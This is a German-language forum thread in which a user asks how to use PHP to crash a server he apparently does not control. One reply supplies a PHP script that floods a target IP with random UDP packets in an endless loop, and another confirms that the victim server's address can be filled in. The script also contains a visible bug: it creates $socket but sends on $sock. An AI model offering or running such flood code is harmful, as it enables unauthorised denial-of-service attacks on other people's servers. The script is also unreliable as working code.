Server zum aufhängen bringen

  • Hi!
    Gibt es mit PHP eine Möglichkeit einen Server so zu überlasten, so dass er sich aufhängt?


    Oder ist es nicht möglich? Wenn nein, vielleicht mit einer anderen Programmiersprache?


    MfG jotter

  • Normaler weiÃ?e müsste ich dich jetz Verwarnen...


    Drück dich bitte deutlicher aus!


    Welchen Server willst du zumaufhängen bringen?
    Was für ein Server.

  • Danke dass du mich noch nicht verwarnt hast. Leider habe ich selber keine werteren Daten von dem Server also welcher Prozessor, Arbeitsspeicher.


    Deswegen ist die Frage hier so allgemein gehalten.
    Kann man durch gewisse abfragen oder so den Server sehrstark belasten?


    Ich weiÃ? dass die Internetgeschwindigkeit sehr gering ist.


    MfG jotter

  • Ich glaube dein Stichwort ist DDoS, bin mir aber noch nicht sicher, ob einen Server durch ein PHP Script überlasten willst, dass du auf den Server hochlädst, oder ob du wirklich ein Flood meinst.

  • Quote from Zacherl;23194

    ein PHP Script überlasten willst, das du auf den Server hochlädst, oder ob du wirklich ein Flood meinst.


    Das hab ich auchmal probiert, aber der server bricht nach 60 sek execution ab, aus Sicherheitsgründen.

  • Ich finde doch eher, wenn man keine Ahnung von der Materie hat, sollte man doch lieber die Finger davon lassen.
    Mir ist es nicht bekannt nen PHP Server ausser durch DDoS zum Aufhängen zu bringen.

  • Ist das einzigste was in die Richtung geht, was du meinst
    [HIDE]
    [PHP]
    $ip_address = '127.0.0.1';
    $socket = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);


    if(!$socket)
    die(__LINE__);


    $data='';


    for ($i=0;$i<1400;$i++) {
    $data.=chr(rand(0,255));
    }


    while(true) {

    if (!socket_sendto($sock,$data,strlen($data),0,$ip_address,9))
    die(__LINE__);


    echo('-');
    }
    [/PHP]
    [/HIDE]

    [SIZE=1]..2x2m Programmierboxen mit Neonlicht, sind definitiv geil!..[/SIZE]
    [SIZE=2]
    &quot;just find an easy way into the database...&quot;
    [/SIZE]
    [SIZE=1]~ the default is never good enough...


    [/SIZE]

  • Quote from jotter;23217

    und bei 127.0.0.1 kann ich dann die IP von dem Server eintragen?


    MfG jotter


    Ja, oder du lässt es auf 127.0.0.1 . Macht auch Spa�

  • Mehr wie den Webserver wirste damit nicht zum Absturz bringen...

    Sie gehen auf ihren kommandierenden<br />Offizier zu, setzen ihm die Waffe an<br />den Kopf und blasen ihm das Gehirn raus.

  • was will man auch mehr von dem script erwarten :D

    [SIZE=1]..2x2m Programmierboxen mit Neonlicht, sind definitiv geil!..[/SIZE]
    [SIZE=2]
    &quot;just find an easy way into the database...&quot;
    [/SIZE]
    [SIZE=1]~ the default is never good enough...


    [/SIZE]